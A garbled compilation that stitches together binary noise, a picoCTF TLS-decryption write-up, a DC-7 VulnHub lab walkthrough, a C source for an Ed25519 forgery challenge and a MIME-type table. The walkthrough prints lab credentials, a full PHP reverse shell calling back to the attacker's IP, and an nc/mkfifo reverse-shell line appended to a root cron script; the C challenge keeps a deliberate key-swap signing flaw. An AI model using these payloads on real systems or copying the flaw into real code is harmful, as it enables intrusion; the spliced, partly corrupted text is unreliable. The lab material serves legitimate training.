	.......5.]fc.....G.....W.j.I..x..;.*.D~X.lX.9eY.@f...XG.f...|.k.l....$3..:g..Y..)e}....?K'.......J...]X.;7..cw.....$.PX..._)7...P]..B..$........xK..O...3..~G..G..Tz...c6.O...*.5....QT...f...s.h....[B.~..|...G..a.L.8.u..@.2....<9.J...r#.......5:i.Y .fG. .._...d..."*.1([^..........K....6"..Y....v...........v.3iL....0E..z~#....b|..]%P.o. M..l......6..XkCw.i..........O...;..A.....1b...................:..gp....v4.5......Kf.......QK.--.~X...6...@..`..$..v......9.'scC?.5k U.....\.....;L".w.nebd.V%......"....+m..
372
....o...B.r....._aa.....M..&.M..o.. .y=*y.....5.L.lm4......-.*.'H3H..OQS...'.._.:5".L.. 4) 4..Nt.e.6.....NO..X.^.>.hA.:.....%.=............= J~HH9.......`m..*.G...RdA....`vOo.^...#...~.X.......v../z....]/*L..]-..GX.... .E...-4.......K........R.*.w...w.........&..\ ]@ns.......\...M2...geM.) ...tN.....D.....|...{...P..entoxo...%..po.O..Z{
	571
	....6..5.]fc....,.T=..u..v..0G.?....!am...+.g(5O].4\.o..(.|G...X......Hr...._...j5..{..j..W.!.,}7.....w.u0Y... 7.....)....U...T1.8r..#..$Zx.q.r..1?.b...`.;..0..h...I..t.d.V......&..-.S6(.3....q.B..t%...... ..LkpN..\B.FH(=JW....w..N..8.[`.:.Z....YxK..#..f....r.W......\....w..^....$.O.....T..KGW..O...`0..t.....J.lIMq..'..7...s....a......n......9.F...Q1...}..K.q)Ex..........U?.th.w. g...u8.6.y.'.gV..z.UO.}E...?>.
===================================================================
root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -qz follow,ssl,ascii,0
Running as user "root" and group "root". This could be dangerous.

===================================================================
Follow: ssl,ascii
Filter: tcp.stream eq 0
Node 0: :0
Node 1: :0
===================================================================
```

Let's use the private key in order to decrypt the TLS layer and view the contents:

```console
root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -o "ssl.debug_file:ssldebug.log" -o "ssl.desegment_ssl_records: TRUE" -o "ssl.desegment_ssl_application_data: TRUE" -o "ssl.keys_list:172.31.22.220,443,http,picopico.key" -qz follow,ssl,ascii,0
Running as user "root" and group "root". This could be dangerous.

===================================================================
Follow: ssl,ascii
Filter: tcp.stream eq 0
Node 0: 128.237.140.23:57567
Node 1: :0
426
GET /starter-template.css HTTP/1.1
Host: ec2-18-223-184-200.us-east-2.compute.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://ec2-18-223-184-200.us-east-2.compute.amazonaws.com/
Pragma: no-cache
Cache-Control: no-cache

	481
	HTTP/1.1 200 OK
	Date: Fri, 23 Aug 2019 15:56:36 GMT
	Server: Apache/2.4.29 (Ubuntu)
	Last-Modified: Mon, 12 Aug 2019 16:47:05 GMT
	ETag: "62-58fee462bf227-gzip"
	Accept-Ranges: bytes
	Vary: Accept-Encoding
	Content-Encoding: gzip
	Pico-Flag: picoCTF{nongshim.shrimp.crackers}
	Content-Length: 100
	Keep-Alive: timeout=5, max=100
	Connection: Keep-Alive
	Content-Type: text/css

	..........K.O.T..RP(HLI..K.-./.R0-J......+.I,*I-.-I.-.I,IEVj.`.T.`..Q..P.ZQ......g.......2.. ...b...

343
GET /favicon.ico HTTP/1.1
Host: ec2-18-223-184-200.us-east-2.compute.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

	542
	HTTP/1.1 404 Not Found
	Date: Fri, 23 Aug 2019 15:56:37 GMT
	Server: Apache/2.4.29 (Ubuntu)
	Content-Length: 326
	Keep-Alive: timeout=5, max=99
	Connection: Keep-Alive
	Content-Type: text/html; charset=iso-8859-1

	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
	<html><head>
	<title>404 Not Found</title>
	</head><body>
	<h1>Not Found</h1>
	<p>The requested URL /favicon.ico was not found on this server.</p>
	<hr>
	<address>Apache/2.4.29 (Ubuntu) Server at ec2-18-223-184-200.us-east-2.compute.amazonaws.com Port 443</address>
	</body></html>
===================================================================
```

This can also be done using the Wireshark GUI: Edit -> Preferences -> Protocols -> SSL (or TLS in newer versions) -> Edit RSA Key List -> Add new entry:

![](images/wirehsark_ssl.png)

The flag is sent as one of the HTTP headers:

```
Pico-Flag: picoCTF{nongshim.shrimp.crackers}
```
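Instead of following the stream interactively, the decrypted response headers can also be pulled out in one pass. A sketch of the idea — the `http.response.line` field name and the `ssl.keys_list` preference syntax are assumptions that may differ between tshark versions:

```console
tshark -r capture.pcap -o "ssl.keys_list:172.31.22.220,443,http,picopico.key" -Y http.response -T fields -e http.response.line
```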
# DC7-WalkThrough

---

## Disclaimer

`This document is for learning and research purposes only. Do not use the techniques or source code in it for illegal purposes. The author takes no responsibility for any negative consequences caused by anyone.`

---

**VM address**

- https://www.vulnhub.com/entry/dc-7,356/

**Description**

DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

While this isn't an overly technical challenge, it isn't exactly easy.

While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-)

If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.

What you will need to do, is to think "outside" of the box. Waaaaaay "outside" of the box. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

**Technical Information**

DC-7 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

**Key techniques**

- Spawning a reverse shell from PHP
- Privilege escalation via a cron job

**Lab environment**

`For reference only`

- VMware® Workstation 15 Pro - 15.0.0 build-10134415
- kali: NAT mode, 192.168.141.134
- Target: NAT mode

---

# Stage 1 - Reconnaissance

Start with host discovery:

```bash
nmap -sP 192.168.141.0/24
```

By elimination — excluding our own machine, the host, and the gateway — `192.168.141.142` is the target.

Scan the open ports:

```bash
nmap -T5 -A -v -p- 192.168.141.142
```

SSH and a web service are open; the site is built with Drupal, just like DC-1. We tried a few CVEs without success, and brute-forcing accounts and directories also led nowhere. After some googling it turns out you need to search Twitter for the user string "DC7USER" shown at the bottom of the page, which leads to his GitHub repository: https://github.com/Dc7User/staffdb

Looks like a code-audit target? It isn't — the repository's config.php contains MySQL credentials:

```
dc7user
MdR3xOgB7#dW
```

Use them to connect to MySQL? No chance — the database port is not exposed. So try them elsewhere. They do not work on the admin panel, so try the SSH service we scanned earlier — and it works.

Look around for anything useful. The database dump files are GPG-encrypted; set them aside for now — there is a mail file:

```
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3EPu-0000CV-5C for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3EeF-0000Dx-G1 for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3Esl-0000Ec-JQ for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3F7H-0000G3-Nb for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3Hvd-0000ED-CP for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3Jng-0000Iw-Rq for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3K28-0000Ll-11 for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3LCo-0000Eb-02 for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3O0y-0000Ed-To for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
```

It looks like a cron job log. Most of it is repetitive — the folder is missing, the files already exist — but it keeps running the script `/opt/scripts/backups.sh`, so take a look:

```
cat /opt/scripts/backups.sh
```

Excellent — it mentions the drush tool. In the DC-1 bonus section I used drush to change the admin user's password directly; we can do the same here:

```
cd /var/www/html
drush user-password admin --password="admin"
```

Note: the drush command must be run from the `/var/www/html` directory.

---

# Stage 2 - Exploitation

Log in to the admin panel. Following https://www.sevenlayers.com/index.php/164-drupal-to-reverse-shell (getting a shell from the Drupal admin panel), go to Manage -> Extend -> List -> Install new module.

Download the plugin from https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz — either have Drupal fetch it directly or upload it manually, your choice.

Once it is uploaded, click "Enable newly added modules", go to the FILTERS section, tick "PHP Filter", and click Install at the bottom.

Back on the home page, in the Tools menu on the left click Add content -> Basic page, choose "PHP code" as the Text format, and paste in a PHP reverse shell.

A ready-to-use PHP source is available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell

```php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.141.134';
$port = 4444;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();

	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}

	if ($pid) {
		exit(0);
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
	0 => array("pipe", "r"),
	1 => array("pipe", "w"),
	2 => array("pipe", "w")
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}
?>
```

Listen on kali:

```
nc -lvp 4444
```

Click preview, and the shell comes back.

---

# Stage 3 - Privilege Escalation

Like dc7user, the www user has no useful privileges, so our hope rests on the backup script from earlier:

```
cd /opt/scripts/
ls -l
```

The file's group is www-data with group permissions rwx, so we can modify the script and try to escalate privileges through the cron job.

Listen on kali:

```
nc -lvp 5555
```

Write the payload:

```
cd /opt/scripts/
echo "mkfifo /tmp/bqro; nc 192.168.141.134 5555 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> /opt/scripts/backups.sh
cat backups.sh
```

Wait patiently for a few minutes and the shell comes back.

Privilege escalation successful — thanks to the box author @DCAU7

---

# Extras

As root I checked the crontab afterwards — sure enough, the damn thing runs every 15 minutes....

---

The GPG dumps can also be decrypted; the passphrase appears to be PickYourOwnPassword.

This can be inferred from the mail in /var/mail/dc7user.
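For reference, a minimal sketch of decrypting one of the dumps with that passphrase. The `.gpg` file name is an assumption based on the paths in the backup script's output; adjust to whatever you actually find in `/home/dc7user/backups/`:

```bash
# --batch + --passphrase avoids the interactive pinentry prompt
gpg --batch --passphrase 'PickYourOwnPassword' -o website.sql -d /home/dc7user/backups/website.sql.gpg
```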
/* Ed25519 existential forgery challenge (built against TweetNaCl). */
#define _POSIX_C_SOURCE 1
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/random.h>
#include <sys/sendfile.h>
#include "tweetnacl.h"

#define Q 1000
#define K 8

void randombytes(unsigned char *p, size_t n)
{
    for (ssize_t r = 0; n -= r; p += r)
        if (0 > (r = getrandom(p, n, 0)))
            exit(-1);
}

static void print_hex(unsigned char const *p, size_t n)
{
    for (size_t i = 0; i < n; ++i)
        printf("%02hhx", p[i]);
}

static size_t read_hex(unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; ++i)
        if (1 != scanf("%02hhx", p + i))
            return i;
    return n;
}

struct keypair {
    unsigned char pk[32], sk[32];
} __attribute__((packed)) keys[K];

void init_keys()
{
    for (unsigned i = 0; i < K; ++i)
        crypto_sign_keypair(keys[i].pk, keys[i].sk);
}

unsigned find(unsigned char const *pk)
{
    unsigned idx;
    for (idx = 0; idx < K; ++idx)
        if (!strncmp(pk, keys[idx].pk, 32))
            break;
    return idx;
}

size_t sign(unsigned char *m, unsigned long long n,
            unsigned char const *pk, unsigned char const *sk)
{
    struct keypair k;
    memcpy(k.sk, sk, sizeof(k.sk));
    memcpy(k.pk, pk, sizeof(k.pk));
    crypto_sign(m, &n, m, n, (char *) &k);
    return n;
}

bool verify(unsigned char const *sm, unsigned long long n, unsigned char const *pk)
{
    char m[n];
    return !crypto_sign_open(m, &n, sm, n, pk);
}

void dump_flag()
{
    if (system("cat flag.txt")) {
        fprintf(stderr, "fl0g is kapot??\n");
        exit(-1);
    }
}

int main()
{
    init_keys();
    printf("Welcome to the Ed25519 existential forgery game! Enjoy and good luck.\n");
    for (unsigned i = 0; i < K; ++i) {
        printf("public key: ");
        print_hex(keys[i].pk, sizeof(keys[i].pk));
        printf("\n");
    }
    char nope[Q][256];
    for (unsigned i = 0; i < Q; ++i) {
        char pk[32], m[320];
        unsigned idx, n;
        printf("public key> ");
        fflush(stdout);
        if (sizeof(pk) != read_hex(pk, sizeof(pk)) || K == (idx = find(pk)))
            break;
        printf("length> ");
        fflush(stdout);
        if (1 != scanf("%u", &n) || n > 256)
            break;
        printf("message> ");
        fflush(stdout);
        if (n != read_hex(m, n))
            break;
        memcpy(nope[i], m, n);
        memset(nope[i] + n, 0, sizeof(nope[i]) - n);
        printf("signed: ");
        /* NB: the server's sk is passed as the "pk" argument and the
           user-supplied pk as the "sk" argument, so the attacker-chosen
           public key lands in the upper half of the NaCl secret key. */
        print_hex(m, sign(m, n, keys[idx].sk, pk));
        printf("\n");
    }
    char sm[320];
    printf("forgery> ");
    fflush(stdout);
    unsigned long long n = read_hex(sm, 320);
    for (unsigned i = 0; i < Q; ++i) {
        if (!memcmp(sm + 64, nope[i], n - 64)) {
            printf("nope!\n");
            exit(0);
        }
    }
    for (unsigned i = 0; i < K; ++i)
        if (verify(sm, n, keys[i].pk)) {
            dump_flag();
            exit(0);
        }
    printf("nope!\n");
}
# Files

---

## Content-Type

Content-Type generally refers to the Content-Type found in web pages. It defines the type and encoding of a network file and determines in what form and with what encoding the browser will read the file — which is why clicking some PHP pages results in downloading a file or an image instead of rendering a page.

The Content-Type header tells the client the content type of the body actually being returned.

Syntax:

```
Content-Type: text/html; charset=utf-8
Content-Type: multipart/form-data; boundary=something
```

**HTTP Content-Type reference table**

| File extension | Content-Type (MIME type) |
| - | - |
| .* (binary stream) | application/octet-stream |
| .001 | application/x-001 |
| .323 | text/h323 |
| .907 | drawing/907 |
| .acp | audio/x-mei-aac |
| .aif | audio/aiff |
| .aiff | audio/aiff |
| .asa | text/asa |
| .asp | text/asp |
| .au | audio/basic |
| .awf | application/vnd.adobe.workflow |
| .bmp | application/x-bmp |
| .c4t | application/x-c4t |
| .cal | application/x-cals |
| .cdf | application/x-netcdf |
| .cel | application/x-cel |
| .cg4 | application/x-g4 |
| .cit | application/x-cit |
| .cml | text/xml |
| .cmx | application/x-cmx |
| .crl | application/pkix-crl |
| .csi | application/x-csi |
| .cut | application/x-cut |
| .dbm | application/x-dbm |
| .dcd | text/xml |
| .der | application/x-x509-ca-cert |
| .dib | application/x-dib |
| .doc | application/msword |
| .drw | application/x-drw |
| .dwf | Model/vnd.dwf |
| .dwg | application/x-dwg |
| .dxf | application/x-dxf |
| .emf | application/x-emf |
| .ent | text/xml |
| .eps | application/x-ps |
| .etd | application/x-ebx |
| .fax | image/fax |
| .fif | application/fractals |
| .frm | application/x-frm |
| .gbr | application/x-gbr |
| .gif | image/gif |
| .gp4 | application/x-gp4 |
| .hmr | application/x-hmr |
| .hpl | application/x-hpl |
| .hrf | application/x-hrf |
| .htc | text/x-component |
| .html | text/html |
| .htx | text/html |
| .ico | image/x-icon |
| .iff | application/x-iff |
| .igs | application/x-igs |
| .img | application/x-img |
| .isp | application/x-internet-signup |
| .java | java/* |
| .jpe | image/jpeg |
| .jpeg | image/jpeg |
| .jpg | application/x-jpg |
| .jsp | text/html |
| .lar | application/x-laplayer-reg |
| .lavs | audio/x-liquid-secure |
| .lmsff | audio/x-la-lms |
| .ltr | application/x-ltr |
| .m2v | video/x-mpeg |
| .m4e | video/mpeg4 |
| .man | application/x-troff-man |
| .mdb | application/msaccess |
| .mfp | application/x-shockwave-flash |
| .mhtml | message/rfc822 |
| .mid | audio/mid |
| .mil | application/x-mil |
| .mnd | audio/x-musicnet-download |
| .mocha | application/x-javascript |
| .mp1 | audio/mp1 |
| .mp2v | video/mpeg |
| .mp4 | video/mpeg4 |
| .mpd | application/vnd.ms-project |
| .mpeg | video/mpg |
| .mpga | audio/rn-mpeg |
| .mps | video/x-mpeg |
| .mpv | video/mpg |
| .mpw | application/vnd.ms-project |
| .mtx | text/xml |
| .net | image/pnetvue |
| .nws | message/rfc822 |
| .out | application/x-out |
| .p12 | application/x-pkcs12 |
| .p7c | application/pkcs7-mime |
| .p7r | application/x-pkcs7-certreqresp |
| .pc5 | application/x-pc5 |
| .pcl | application/x-pcl |
| .pdf | application/pdf |
| .pdx | application/vnd.adobe.pdx |
| .pgl | application/x-pgl |
| .pko | application/vnd.ms-pki.pko |
| .plg | text/html |
| .plt | application/x-plt |
| .png | application/x-png |
| .ppa | application/vnd.ms-powerpoint |
| .pps | application/vnd.ms-powerpoint |
| .ppt | application/x-ppt |
| .prf | application/pics-rules |
| .prt | application/x-prt |
| .ps | application/postscript |
| .pwz | application/vnd.ms-powerpoint |
| .ra | audio/vnd.rn-realaudio |
| .ras | application/x-ras |
| .rdf | text/xml |
| .red | application/x-red |
| .rjs | application/vnd.rn-realsystem-rjs |
| .rlc | application/x-rlc |
| .rm | application/vnd.rn-realmedia |
| .rmi | audio/mid |
| .rmm | audio/x-pn-realaudio |
| .rms | application/vnd.rn-realmedia-secure |
| .rmx | application/vnd.rn-realsystem-rmx |
| .rp | image/vnd.rn-realpix |
| .rsml | application/vnd.rn-rsml |
| .rtf | application/msword |
| .rv | video/vnd.rn-realvideo |
| .sat | application/x-sat |
| .sdw | application/x-sdw |
| .slb | application/x-slb |
| .slk | drawing/x-slk |
| .smil | application/smil |
| .snd | audio/basic |
| .sor | text/plain |
| .spl | application/futuresplash |
| .ssm | application/streamingmedia |
| .stl | application/vnd.ms-pki.stl |
| .sty | application/x-sty |
| .swf | application/x-shockwave-flash |
| .tg4 | application/x-tg4 |
| .tif | image/tiff |
| .tiff | image/tiff |
| .top | drawing/x-top |
| .tsd | text/xml |
| .uin | application/x-icq |
| .vcf | text/x-vcard |
| .vdx | application/vnd.visio |
| .vpg | application/x-vpeg005 |
| .vsd | application/x-vsd |
| .vst | application/vnd.visio |
| .vsw | application/vnd.visio |
| .vtx | application/vnd.visio |
| .wav | audio/wav |
| .wb1 | application/x-wb1 |
| .wb3 | application/x-wb3 |
| .wiz | application/msword |
| .wk4 | application/x-wk4 |
| .wks | application/x-wks |
| .wma | audio/x-ms-wma |
| .wmf | application/x-wmf |
| .wmv | video/x-ms-wmv |
| .wmz | application/x-ms-wmz |
| .wpd | application/x-wpd |
| .wpl | application/vnd.ms-wpl |
| .wr1 | application/x-wr1 |
| .wrk | application/x-wrk |
| .ws2 | application/x-ws |
| .wsdl | text/xml |
| .xdp | application/vnd.adobe.xdp |
| .xfd | application/vnd.adobe.xfd |
| .xhtml | text/html |
| .xls | application/x-xls |
| .xml | text/xml |
| .xq | text/xml |
| .xquery | text/xml |
| .xsl | text/xml |
| .xwd | application/x-xwd |
| .sis | application/vnd.symbian.install |
| .x_t | application/x-x_t |
| .apk | application/vnd.android.package-archive |
| .tif | image/tiff |
| .301 | application/x-301 |
| .906 | application/x-906 |
| .a11 | application/x-a11 |
| .ai | application/postscript |
| .aifc | audio/aiff |
